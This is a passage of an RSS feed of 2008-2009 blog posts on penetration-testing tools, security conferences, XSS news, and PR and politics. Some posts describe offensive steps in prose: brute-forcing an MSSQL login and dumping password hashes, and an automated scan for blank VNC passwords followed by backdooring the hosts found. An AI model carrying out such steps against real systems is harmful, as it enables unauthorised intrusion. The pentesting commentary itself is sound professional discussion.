         <description>I wish I had the ultimate tool, whether that is a programming language such as perl, python and ruby, or whether it is a framework like metasploit and vulnerability scanner like nessus. I wish, but I know that such a thing doesn&amp;#8217;t exist and probably never will. Lately I&amp;#8217;ve been dropping a lot of bash scripts on public forums and of course on work related projects. Many people came back to me asking why I chose bash. Python or perl would have been better! [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2842</guid>
         <pubDate>Fri, 10 Apr 2009 13:18:31 -0700</pubDate>
         <content:encoded><![CDATA[<p>I wish I had the ultimate tool, whether that is a programming language such as perl, python and ruby, or whether it is a framework like metasploit and vulnerability scanner like nessus. I wish, but I know that such a thing doesn&#8217;t exist and probably never will.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/hckyso/3191642647/"><img src="http://farm4.static.flickr.com/3255/3191642647_70b39632f9.jpg?v=1231794403" alt="Tools of Trade"/></a></div> <p>Lately I&#8217;ve been dropping a lot of bash scripts on public forums and of course on work related projects. Many people came back to me asking why I chose bash. <q>Python or perl would have been better!</q> While I agree that both python and perl are a lot more expressive, I disagree that tools in general should be written just to accommodate the needs of a particular framework. Tools are tools and they have their lifetime just like everything else. So should we bother?</p> <p>Recently I had to communicate with an MSSQL server on a pentesting job. For that purpose I downloaded sqsh. Unfortunately the tool failed with a linking error. So I decided to go and download the sources and compile. I did that but the build failed because my environment was lacking certain unusual environment variables the tool needed to build successfully. Alright, running out of time, I decided to check whether there are other tools for SQL server. I found dbishell which is a tool written in perl. I ran the tool against the Sybase backend but it complained that I was missing libraries. So I downloaded the dbi sybase perl libraries and installed them. I ran the tool again but it failed with an error. It couldn&#8217;t display the error because I was lacking another perl library.</p> <p>Ok, that was ridiculous and I desperately needed a solution. So I came up with something I do not normally do. 
I checked PHP&#8217;s sybase integration online and I found that it is relatively straightforward to communicate with MSSQL backends from PHP scripts. I wrote a simple script to bruteforce the login with several passwords I had at hand. Once I found the login, lucky me, I wrote another script, again in PHP, just to dump various information from the database such as other database users and their hashes. Lucky me!</p> <div class="message">In summary, I spent a ridiculous amount of time trying to make established frameworks and tools work while I could have saved all the hassle and started with PHP from the beginning.</div> <p>The reason I am telling you this story is because I have an important message to convey here: <q>Tools are just Tools!</q> If metasploit cannot exploit the vulnerability perhaps you can create something yourself. If nessus fails to detect a problem, perhaps there is another approach you should use to handle the situation. We often start a new framework or tool and suddenly decide that it should handle all situations. Well that is virtually impossible! The situation always changes.</p> <p>So, don&#8217;t stick to a single tool just because it works 80% of the time. And don&#8217;t waste time trying to make the tool work in the remaining 20%. It is pointless, especially when you are dealing with frameworks. There are a lot more elegant solutions out there you can employ to solve your particular problem. These solutions may not be elegant and perhaps they are written in something as unconventional as <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Brainfuck">brainfuck</a>, but they are solutions nevertheless.</p> <p><em>Remember, tools solve problems! If a tool cannot solve the problem it is no longer a tool. 
It is a useless blob!</em></p>]]></content:encoded>
      </item>
      <item>
         <title>More Penetration Testing Goodness with Jeriko</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/QZBD7XGSM3E/</link>
         <description>Over the last couple of weeks I&amp;#8217;ve added more features to the Jeriko toolkit which I briefly covered in my post over here. For those of you who don&amp;#8217;t know, Jeriko is a compilation of various bash scripts to ease manual penetration testing practices. The idea is to automate only the things which are sort of boring. Anyway, now you have a few more scripts at your disposal. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2835</guid>
         <pubDate>Tue, 07 Apr 2009 14:14:29 -0700</pubDate>
         <content:encoded><![CDATA[<p>Over the last couple of weeks I&#8217;ve added more features to the <a rel="nofollow" target="_blank" href="http://code.gnucitizen.org/jeriko">Jeriko</a> toolkit which I briefly covered in my post over <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/you-dont-need-the-ultimate-pen-testing-framework/">here</a>. For those of you who don&#8217;t know, Jeriko is a compilation of various bash scripts to ease manual penetration testing practices. The idea is to automate only the things which are sort of boring.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/geishaboy500/2777962535/"><img src="http://farm4.static.flickr.com/3172/2777962535_208b4ac418.jpg?v=0" alt="Lightpainting Tools"/></a></div> <p>Anyway, now you have a few more scripts at your disposal. The most notable changes are the ability to discover service versions via <code>extract-services</code>, the ability to discover and generate URLs from services which offer HTTP (courtesy of <code>generate-url-batch</code>, <code>expand-url-credentials</code> and <code>expand-url-dirs</code>) and the ability to grab screenshots of all web servers via <code>scan-browsers</code>.</p> <p>Personally, I find the <code>scan-browsers</code> script extremely useful. Let&#8217;s say that you encounter a bunch of web servers but you don&#8217;t know what they are for. You can fire the browser and start executing URLs one after another but that will take time and you can easily get confused. Instead of doing that you can do the following:</p> <pre><code>$ generate-url-batch | scan-browsers</code></pre> <p>This command will iterate over each discovered HTTP server and take a screenshot of the front page. The script can be safely executed even in environments which do not have the X server installed. 
In fact, you do not need it at all, because the script relies on a virtual framebuffer server.</p> <p>After the command completes, you will have your current working directory populated with the screen grabs. Now you can use your default picture viewer to see all web servers quite rapidly. This script is also handy in pentests when you need to take evidence of particular vulnerable web servers/applications.</p> <p><em>Although Jeriko is already useful, I am planning to totally redesign the platform. Future versions will have more granular control over the pentesting process and the ability to automate large chunks of boring activities.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>On Security Buzzwords</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/pBLmO4nVvmA/</link>
         <description>I&amp;#8217;ve got quite a lot of good feedback on the security buzzword generator I announced yesterday. For those of you who do not know, the generator is a fun little utility part of the GNUCITIZEN campaigns which helps you with coming up with new and exciting buzzwords like a security pro. We often laugh when a new buzzword makes its rounds in the media but the matter of fact is that buzzwords are important. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2826</guid>
         <pubDate>Fri, 03 Apr 2009 02:36:08 -0700</pubDate>
         <content:encoded><![CDATA[<p>I&#8217;ve got quite a lot of good feedback on the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/cmpgn/security-buzzword-generator">security buzzword generator</a> I <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/security-buzzword-generator/">announced yesterday</a>. For those of you who do not know, the generator is a fun little utility part of the GNUCITIZEN campaigns which helps you with coming up with new and exciting buzzwords like a security pro.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/goingnature/3081998237/"><img src="http://farm4.static.flickr.com/3281/3081998237_56cd1e0b4d.jpg?v=0" alt="Locative Dynamics"/></a></div> <p>We often laugh when a new buzzword makes its rounds in the media but the matter of fact is that buzzwords are important. In essence, buzzwords are just terminology which happens to be used extensively by the media. I find it funny to follow rants of people who are obviously against buzzwords but they make use of buzzwords themselves. If you are against them, just don&#8217;t use them. I am curious to see how you are going to find a common language with the rest of the world.</p> <p>Here are a few examples of security buzzwords which are considered an everyday terminology nowadays:</p> <ul>
<li>Null Pointer Dereference</li>
<li>Cross-site Scripting</li>
<li>Rebinding Attacks</li>
<li>Botnets</li>
<li>Storm Worm</li>
<li>Virtualized Rootkits</li>
<li>there are tons more&#8230;</li>
</ul> <p>They are buzzwords because at some point they were virtually all over the Web. Today&#8217;s buzzword is Conficker. If you find something new and intriguing it most certainly will become a buzzword. Is that really that bad?</p> <h3>Q&#038;A with the Public</h3> <p>I have a question for the public. <q>Dear Reader, what do you call a script injection exploit which happens within the boundaries of the browser&#8217;s chrome?</q></p>]]></content:encoded>
      </item>
      <item>
         <title>Security Buzzword Generator</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/y3PpG9le2Rs/</link>
         <description>In the light of the Month of New Security Buzzwords, I am releasing an online fuzzer to help you generate as many security buzzwords as you like. Sweet! Jokes aside, tools like this one are quite helpful to brainstorm new ideas. If you ever do research inspired by our buzzword generator, please give us a credit. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2819</guid>
         <pubDate>Thu, 02 Apr 2009 04:27:25 -0700</pubDate>
         <content:encoded><![CDATA[<p>In the light of the <a rel="nofollow" target="_blank" href="http://www.cgisecurity.com/2009/04/month-of-new-security-buzzwords.html">Month of New Security Buzzwords</a>, I am releasing an online <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/cmpgn/security-buzzword-generator">fuzzer</a> to help you generate as many security buzzwords as you like. Sweet!</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/nickoneill/99773518/"><img src="http://farm1.static.flickr.com/25/99773518_62aa62b5ce.jpg?v=0" alt="The at&#038;t ad that I want to see"/></a></div> <p><em>Jokes aside, tools like this one are quite helpful to brainstorm new ideas. If you ever do research inspired by our buzzword generator, please give us a credit. That way we will know that the tool is actually useful.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>No Frameworks but Environments</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/jCo1jHXStho/</link>
         <description>We certainly don&amp;#8217;t need the ultimate pentesting framework but we can make use of the ultimate pen-testing environment. This is sort of a pre-announcement of a tool I am currently working on, different from jeriko, which I hope will improve the way we do pentests. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2815</guid>
         <pubDate>Wed, 18 Mar 2009 03:51:21 -0700</pubDate>
         <content:encoded><![CDATA[<p>We certainly <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/you-dont-need-the-ultimate-pen-testing-framework/">don&#8217;t need the ultimate pentesting framework</a> but we can make use of the ultimate pen-testing environment.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/toner/47112062/"><img src="http://farm1.static.flickr.com/32/47112062_8bffc0b86a.jpg?v=0" alt="environments 5"/></a></div> <p>This is sort of a pre-announcement of a tool I am currently working on, different from <a rel="nofollow" target="_blank" href="http://code.gnucitizen.org/jeriko/">jeriko</a>, which I hope will improve the way we do pentests. The tool is in its early stage of development and I could make use of several JavaScript coders if someone is up for the challenge.</p>]]></content:encoded>
      </item>
      <item>
         <title>CONFidence 2009 coming up soon!</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/gBfOBg2zuYc/</link>
         <description>The new edition of CONFidence is coming up soon! CONFidence, which has become one of the biggest technical IT security conferences in Europe, is taking place on 15-16 May in the beautiful city of Krakow. This is the fifth year CONFidence is taking place, and there have been several changes introduced. First of all there will be two simultaneous tracks after lunch time, whereas previous editions only offered one track all day. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2773</guid>
         <pubDate>Sat, 14 Mar 2009 06:47:47 -0700</pubDate>
         <content:encoded><![CDATA[<p>The new edition of <a rel="nofollow" target="_blank" href="http://2009.confidence.org.pl/">CONFidence</a> is coming up soon! CONFidence, which has become one of the biggest technical IT security conferences in Europe, is taking place on 15-16 May in the beautiful city of <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Krak%C3%B3w">Krakow</a>.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/static/blog/2009/03/confidence.png"><img src="http://www.gnucitizen.org/static/blog/2009/03/confidence.png" title="CONFidence 2009"/></a></div> <p>This is the fifth year CONFidence is taking place, and there have been several changes introduced. First of all there will be two simultaneous tracks after lunch time, whereas previous editions only offered one track all day. Also, this year introduced the <strong>Hackers&#8217; Squad</strong>, which sounds to me like a great idea for learning and having fun at the same time. The following is mentioned on the CONFidence website regarding the Hackers&#8217; Squad:</p> <blockquote><p>During 5th edition of CONFidence you have a unique chance to stay at the coolest spot in the city Hackers&#8217; Squad. It is a place where hacking never stops!</p> <p>We decided to rent the whole hostel (or even group of hostels if it&#8217;s necessary) and turn it into the real hacking space a place to sleep, to party and to hack &#8211; only for CONFidence attendees.</p></blockquote> <p>Last year pdp and I had a blast at the event, which we found to be one of the best organized security cons we&#8217;ve been to. To date, I can say that CONFidence and <a rel="nofollow" target="_blank" href="http://conference.hackinthebox.org/">HITBSecConf</a> &#8211; aka Hack in the Box &#8211; are probably my two favorite hacker events. 
Unfortunately, pdp won&#8217;t be speaking at CONFidence this year, but he will be busy presenting at other events such as <a rel="nofollow" target="_blank" href="http://conference.auscert.org.au/conf2009/">AusCERT 2009</a>.</p> <h3>My humble talk on credit card theft</h3> <p>I&#8217;d like to personally thank Andrzej Targosz for inviting me to speak this year, making it the second time I&#8217;ll deliver a presentation at CONFidence. I hope my presentation will be interesting and entertaining enough for the audience. This is the abstract for my talk:</p> <blockquote><p>You are a security geek, you specialize in pentesting, but somehow during your career you&#8217;ve had to deal with PCI DSS. Yes, PCI DSS can be very boring, I feel your pain! Pentesters usually don&#8217;t like standards because they understand that there is only so much they can do to help organizations protect their information assets. On top of that, pentesters usually like to experiment which goes against the principle of boring audit checklists.</p> <p>In this presentation, we will cover PCI DSS and credit card security from a (hopefully) fun perspective, with a focus on credit card theft techniques. How are merchants and service providers being compromised? How about us consumers? What loopholes currently exist in the PCI DSS standards which still allow unsophisticated attackers to compromise credit card data?</p> <p>This presentation is <em>not</em> brought to you by a PCI DSS expert, but rather a frustrated pentester who will attempt to show you that PCI DSS and credit card security in general can be a fun topic! 
Knowledge learned from performing pentests and from working with QSAs who have assessed compromised data centers will be shared.</p></blockquote> <p>Of course, if you have any thoughts on things you think I should cover in my presentation I&#8217;m all ears!</p> <h3>Talks I&#8217;m interested in</h3> <p>I must say that there are quite a few presentations that look interesting, but it was <a rel="nofollow" target="_blank" href="http://2009.confidence.org.pl/prelegenci/rich-smith">Rich Smith</a>&#8217;s abstract on attacking VNC that caught my eye the most.</p> <p>The reason why I&#8217;m interested in this talk is because Rich is basically answering a question I asked myself a long time ago when the infamous <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/archive/1/433994/30/0/threaded">VNC auth bypass vuln</a> was discovered: can we programmatically run commands via the Remote Frame Buffer (RFB) protocol which VNC relies on? It seems that Rich has done a heck of a job at answering this question!</p> <p>I remember exploiting the VNC auth bypass bug during pentest assessments. Basically, once you gained access to the desktop two things could happen: 1) the screen is locked and you&#8217;re stuck, 2) the screen is unlocked and you gain access to the currently-logged-in user&#8217;s session.</p> <p>In the second case, you can obviously do anything including running commands of course. So if the logged-in user has admin privileges on the box, it&#8217;s a full compromise pretty much. However, the attack can be very noisy, since the attacker is graphically interacting with the desktop. For instance, imagine if the admin was physically sitting in front of the compromised system while watching someone else opening the command prompt, etc. Another scenario which can arouse suspicion is the admin remotely VNCing into the box. If the attacker also connects via VNC to the same box, that would kill the admin&#8217;s VNC session. 
Quite noisy as you can imagine.</p> <p>So my question back then was, <em>could someone programmatically compromise a box via VNC and then launch a malicious payload?</em> i.e.: adding a new OS account. I must say that I dug a bit back then and it&#8217;s not as trivial as it sounds, which is what Rich is arguing in his presentation, although he did manage to write a Python library and suite of tools for automating tasks like this.</p> <p>Think of the following automatic task:</p>
<ol> <li>scan boxes for blank VNC passwords</li> <li>if blank pass allowed, then backdoor system</li> <li>continue scanning</li>
</ol> <p><em>Fun indeed!</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Codez Are Up</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/-bajiIRJLbs/</link>
         <description>This is a quick announcement just to let you know that our codes are now getting synced at code.gnucitizen.org, which is basically a file browser interface to the source repositories. The reason I had to come up with something like this is because most of our projects are dispersed across several Google Code repositories, personal SVNs and many other places. We have started so many ideas in the past that now it is hard to keep track of everything. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2768</guid>
         <pubDate>Wed, 11 Mar 2009 07:18:54 -0700</pubDate>
         <content:encoded><![CDATA[<p>This is a quick announcement just to let you know that our codes are now getting synced at <a rel="nofollow" target="_blank" href="http://code.gnucitizen.org">code.gnucitizen.org</a>, which is basically a file browser interface to the source repositories.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/lofi/398077393/"><img src="http://farm1.static.flickr.com/147/398077393_873acbecaa.jpg?v=0" alt="Coding can kill"/></a></div> <p>The reason I had to come up with something like this is because most of our projects are dispersed across several Google Code repositories, personal SVNs and many other places. We have started so many ideas in the past that now it is hard to keep track of everything. Also, many people ask us for the source codes of old projects and we simply don&#8217;t know where to point them to.</p> <p><em>Not everything is added yet. I will keep putting stuff in!</em></p>]]></content:encoded>
      </item>
      <item>
         <title>New Facebook XSS Vulnerabilities</title>
         <link>http://blog.blogsecurify.com/2008/12/new-facebook-xss-vulnerabilities.html</link>
         <description>There was some buzz today about &lt;a rel="nofollow" target="_blank" href="http://www.xssed.com/news/80/New_highly_critical_Facebook_XSS_vulnerabilities_pose_serious_privacy_risks/"&gt;four new Facebook XSS vulnerabilities announced&lt;/a&gt;. XSS (cross site scripting) is nothing new for Facebook but it's interesting since there is a pretty impressive worm called Koobface still making its way around the Facebook user base (&lt;a rel="nofollow" target="_blank" href="http://www.pcworld.com/businesscenter/article/155462/koobface_virus_spreads_to_bebo.html"&gt;now spreading to Bebo&lt;/a&gt;). Koobface spread easily through social engineering techniques and XSS has been used to assist with similar types of attacks in the past. Interesting to see if there will be a combo Koobface/XSS type attack in the future. &lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;I won't go into a ton of detail about these new vulnerabilities but for a very good write up on these flaws and how they might relate to other attacks going on with social media check out &lt;a rel="nofollow" target="_blank" href="http://blogs.zdnet.com/security/?p=2308"&gt;Dancho Danchev's article over at zdnet&lt;/a&gt;.&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-6897842020367284740</guid>
         <pubDate>Mon, 15 Dec 2008 18:34:00 -0800</pubDate>
      </item>
      <item>
         <title>Miss “Accountable” 2008</title>
         <link>http://www.spinhunters.org/blog/miss-accountable-2008/</link>
         <description>The beauty award this year goes to the International Federation of Organic Agriculture Movements (IFOAM), followed by the European Bank of Reconstruction and Development and Unicef. The lowest reputation scores, however, were received by the International Olympic Committee and NATO. Not surprising at all! [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=174</guid>
         <pubDate>Fri, 12 Dec 2008 12:23:39 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/xjy/51519638/"><img class="initial-capital" src="http://farm1.static.flickr.com/29/51519638_6b899a7d1c_m.jpg?v=0" alt="051003 storting crown prince's crown"/></a><p>The beauty award this year goes to the <a rel="nofollow" target="_blank" href="http://www.ifoam.org/">International Federation of Organic Agriculture Movements (IFOAM)</a>, followed by the <a rel="nofollow" target="_blank" href="http://www.ebrd.com/">European Bank of Reconstruction and Development</a> and <a rel="nofollow" target="_blank" href="http://www.unicef.org.uk/">Unicef</a>. The lowest reputation scores, however, were received by the International Olympic Committee and NATO. Not surprising at all! You should not expect that military and sport organizations would have been ranked higher than that, especially when their image is closely related to the general image of the services they offer and the image of the places where their headquarters are based. Being accountable is also a tough task for most corporations as they fail to deploy effective policies and active management systems.</p> <p><strong>The Contest:</strong> According to the latest survey of <a rel="nofollow" target="_blank" href="http://www.oneworldtrust.org/">One World Trust</a> (a British Think Tank), the IFOAM, along with 29 other powerful organizations, has been assessed in terms of its accountability to stakeholders and the wider public. The scope of the research was based on the assessment of four major criteria such as transparency, participation with outsiders, evaluation and complaints handling. Turns out that none of the companies actually managed to score higher than 70 percent accountability, which is a very low and insufficient result. 
The official report also states:</p> <blockquote>A score of 70 percent indicates that an organisation has policies in place that meet only some good practice principles and the basic management systems to support their implementation. This is the floor, not the ceiling, of accountability capabilities. If global organisations are to be part of the solution to global challenges, there needs to be a step change in their approaches to accountability. They need to start implementing the more challenging accountability reforms which truly empower external stakeholders to hold an organisation to account. Organisations must also take the necessary steps to embed accountability in their culture and ensure it is being translated into practice.</blockquote> <p>The other interesting conclusion that has been made is that all of the evaluated companies failed to show good scores (more than 50 percent) in their transparency policies and complaint handling procedures. It is funny that <a rel="nofollow" target="_blank" href="http://www.transparency.org/">Transparency International</a> (a global organization that tries to fight corruption) takes one of the lowest positions in this chart. Why is this so important? Well, from a Black PR perspective, these are pretty severe vulnerabilities. If an attacker manages to hack into the corporate complaint tracking software and steals all of the important data, he can easily turn that into a massive negative campaign. The affected organization will not only be caught in a very awkward situation, but it will be unable to respond properly to the increasing flow of stakeholder complaints. This also leads to intense media attention and general public dissatisfaction.</p> <p>One more thing &#8211; I did a little research on my own and I found out that the Google Page Ranks of the less accountable organizations are way higher than the Page Rank of the organizations at the top of the list. 
However, if you type their name and the word <q>reputation</q> into the search box, you will find that the first couple of pages are filled with negative publications and comments. I guess popularity is not always proportionally related to the general stakeholders&#8217; respect.</p>]]></content:encoded>
      </item>
      <item>
         <title>Crisis Communication Is Like …Surfing</title>
         <link>http://www.spinhunters.org/blog/crisis-communication-is-like-surfing/</link>
         <description>I don&amp;#8217;t know about you but today I have started writing my New Year&amp;#8217;s Resolution List. One of the things I am eager to do next year is to learn how to surf. It&amp;#8217;s cool, risky and very challenging. What I like most about it is the sense of uncertainty and the way you need to survive with a minimum set of resources. Surfing is like crisis management, don&amp;#8217;t you think? [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=169</guid>
         <pubDate>Wed, 10 Dec 2008 11:57:31 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/hell_silva/964565773/"><img class="initial-capital" src="http://farm2.static.flickr.com/1430/964565773_44fcb87572_m.jpg?v=0" alt="too much surf in your head?"/></a><p>I don&#8217;t know about you but today I have started writing my New Year&#8217;s Resolution List. One of the things I am eager to do next year is to learn how to surf. It&#8217;s cool, risky and very challenging. What I like most about it is the sense of uncertainty and the way you need to survive with a minimum set of resources.</p> <p>Surfing is like crisis management, don&#8217;t you think? If you actually compare some of the basic tutorials in both disciplines, you will probably find a lot of similarities. So, once you master the ability to stay upright on the board, you can easily gain the confidence for dealing with some of the most severe crises in the corporate world.</p> <h3>How to Start</h3> <p>When a crisis occurs, the first thing to consider is finding the balance point. Use your company&#8217;s strengths and all those positive qualities that cannot be doubted by the others. This will help you to balance out all the negative publications and unfair accusations. For example, if your organization is being socially responsible and undertakes many charitable events, this actually can help to save your stakeholders&#8217; trust and turn the crisis into unexpected corporate profit.</p> <p>The second crucial habit that must be developed is the ability to respond as quickly as possible to the changing environment. The speed is absolutely everything for both surfing and crisis management. It gives you not only a competitive edge, but also the power to predict every negative outcome. At the same time, do not forget to keep it low once you get the situation back in control. 
In almost every zoology book it is stated that the most dangerous moment for the target is right after its escape from the predator. So if you keep looking at your feet, you will definitely fall down again. Instead, you should &#8220;cover the back of your head&#8221; and protect all your vital assets from further damage. Stay &#8220;under the water&#8221; as long as you can, but never lose the honesty in your conversations.</p> <p>Safety should always be in the back of your mind, which is a reason why you should never be surfing alone. You never know what might go wrong even on the smallest of waves &#8211; it&#8217;s good to have someone who can help you out if you get into trouble.</p>]]></content:encoded>
      </item>
      <item>
         <title>Back In The Classroom: Noam Chomsky on Corporate Propaganda Techniques</title>
         <link>http://www.spinhunters.org/blog/back-in-the-classroom-noam-chomsky-on-corporate-propaganda-techniques/</link>
         <description>I just stumbled across an old video on YouTube and I think it is worth sharing. The video is about the origin of the Public Relations industry in the US and why the modern democratic societies need to be manipulated. As it turns out, the free public mind is one of the greatest threats to many corporations and political regimes as it could easily destroy their long-term goals, ideologies and operations. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=158</guid>
         <pubDate>Fri, 05 Dec 2008 12:03:59 -0800</pubDate>
         <content:encoded><![CDATA[<p>I just stumbled across an old video on YouTube and I think it is worth sharing. The video is about the origin of the Public Relations industry in the US and why the modern democratic societies need to be manipulated.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/a4K2uBI61z4&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" width="425" height="344"></iframe></div> <p>As it turns out, the free public mind is one of the greatest threats to many corporations and political regimes as it could easily destroy their long-term goals, ideologies and operations. Chomsky also says that the idea of democracy gives an enormous, anarchic power to the regular people, which could be quite harmful to the society in general. Actually, propaganda is one of Chomsky&#8217;s favorite topics as he wrote many books about it &#8211; <em>Media Control: The Spectacular Achievements of Propaganda</em>, <em>Manufacturing Consent: The Political Economy of the Mass Media and Propaganda</em> and <em>The Public Mind: Conversations with Noam Chomsky</em>. 
Great reads for those who are interested.</p>]]></content:encoded>
      </item>
      <item>
         <title>A Note For Hillary: Stop Tarnishing The Democratic Values</title>
         <link>http://www.spinhunters.org/blog/a-note-for-hillary-stop-tarnishing-the-democratic-values/</link>
         <description>It is official! Hillary Clinton is finally appointed as the new Secretary of State. Congrats!!!! Let me tell you, this lady is anything but a loser and will do everything just to get to the power of the state. It seems like she is absolutely capable of taking every political position you can think of &amp;#8211; a first lady, a senator, a president wanna-be, a vice president and if all this fails why not a head of international affairs. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=148</guid>
         <pubDate>Wed, 03 Dec 2008 14:41:08 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/saz/34630357/"><img class="initial-capital" src="http://farm1.static.flickr.com/21/34630357_a5b1c00f5d_m.jpg?v=0" alt="note"/></a><p>It is official! Hillary Clinton is finally appointed as the new Secretary of State. Congrats!!!! Let me tell you, this lady is anything but a loser and will do everything just to get to the power of the state. It seems like she is absolutely capable of taking every political position you can think of &#8211; a first lady, a senator, a president wanna-be, a vice president and if all this fails why not a head of international affairs. There is nothing wrong with this, except that the recent political history is entirely dominated by families like the Bushes and the Clintons. Looks like once you taste the power of the White House, it is not easy to give it up. I cannot help but wonder, where is the real change that we have been awaiting for so long?</p> <p>Funny enough, just a few weeks ago both Hillary Clinton and Barack Obama said that they want to improve America&#8217;s standing in the world. The Democrats&#8217; victory was easily labeled by different media outlets as &#8220;historic&#8221; and has put hopes for a brighter future not only in the US, but also in the whole world itself. Barack Obama is not just the first black president; he is a symbol of new political standards, a chance of economic survival and a representative of a new class of world leaders. For the first time in many years (maybe after Nelson Mandela&#8217;s jail release), people all over the world were united in something bigger than their own social troubles. 
They were proud of the choice they made and were actually interested in following the news, counting the votes and somehow being personally involved in the whole competition.</p> <h3>What happened?</h3> <p>Let me take you back to the time when Hillary Clinton tried to &#8220;nominate&#8221; herself as a potential candidate for vice-presidency. Every rational political analyst at that time fiercely criticized the opportunity of pairing the &#8220;two former rivals&#8221; into the same election list. Moreover, it was said to be an absolutely wrong move and a second chance for Bill Clinton to overshadow the upcoming cabinet. Hillary was also seen as an obstacle that could put many prospective voters off Obama&#8217;s political platform. Not to mention the numerous dirty tricks that both candidates used to play on each other. Actually the fight between them was even more bitter and more aggressive than the one with the Republicans.</p> <p>Today, after the election, the partnership between Obama and Clinton has been suddenly seen as the logical conclusion of a long, exhausting race. However, there are still a couple of issues that must be considered. Hillary is not the type of woman that will be easily controlled. No matter how suitable or experienced she is for being a Secretary of State, she also has a wide network of business/political connections which could put her into a great dominance over the rest of the crew. This means that her political leverage will be getting stronger and stronger each day, which kind of makes this team ineffective at its very beginning.</p> <h3>Bottom Line:</h3> <p>One of the good things about Democracy is the idea of free choice. The American people were actually unable to vote about the alliance between Hillary and Obama (as it would happen if she was officially named his running mate). Now they are forced to accept it. 
All this raises the question if we ever had the opportunity to choose between different democratic alternatives or everything was already set up as part of a nasty, political scenario. No matter how good it sounds in theory, the change has been already made, unfortunately not by us.</p> <p><em>Definitely not a good sign for the American reputation!</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Wordpress Upgrades to 2.6.5</title>
         <link>http://blog.blogsecurify.com/2008/11/wordpress-upgrades-to-265.html</link>
         <description>A reminder to all you Wordpress users...make sure you update to version 2.6.5. From the &lt;a rel="nofollow" target="_blank" href="http://wordpress.org/development/2008/11/wordpress-265/"&gt;Wordpress Blog&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;"The security issue is an XSS exploit discovered by Jeremias Reith that fortunately only affects IP-based virtual servers running on Apache 2.x. If you are interested only in the security fix, copy &lt;code&gt;wp-includes/feed.php&lt;/code&gt; and &lt;code&gt;wp-includes/version.php&lt;/code&gt; from the 2.6.5 release package. 2.6.5 contains three other small fixes in addition to the XSS fix. The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests.&lt;br /&gt;&lt;br /&gt;...note that we are skipping version 2.6.4 and jumping from 2.6.3 to 2.6.5 to avoid confusion with a fake 2.6.4 release that made the rounds. There is not and never will be a version 2.6.4."&lt;/blockquote&gt;If you get something that tells you to install 2.6.4...don't do it! :-)</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-8859265458083182911</guid>
         <pubDate>Sat, 29 Nov 2008 21:42:00 -0800</pubDate>
      </item>
      <item>
         <title>“Big”, “Small” and “Fat” Reputations (The Healthy Edition)</title>
         <link>http://www.spinhunters.org/blog/big-small-and-fat-reputations-the-healthy-edition/</link>
         <description>In the mood of the upcoming Christmas feasts, here are our tips on how to stay corporate fit during the season. As you know, during this time of the year most companies are quite busy with the execution of various sales campaigns or are rushing to close important deals right before New Year&amp;#8217;s Eve. Christmas also means lots of parties, reunions and gatherings. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=142</guid>
         <pubDate>Thu, 27 Nov 2008 11:36:47 -0800</pubDate>
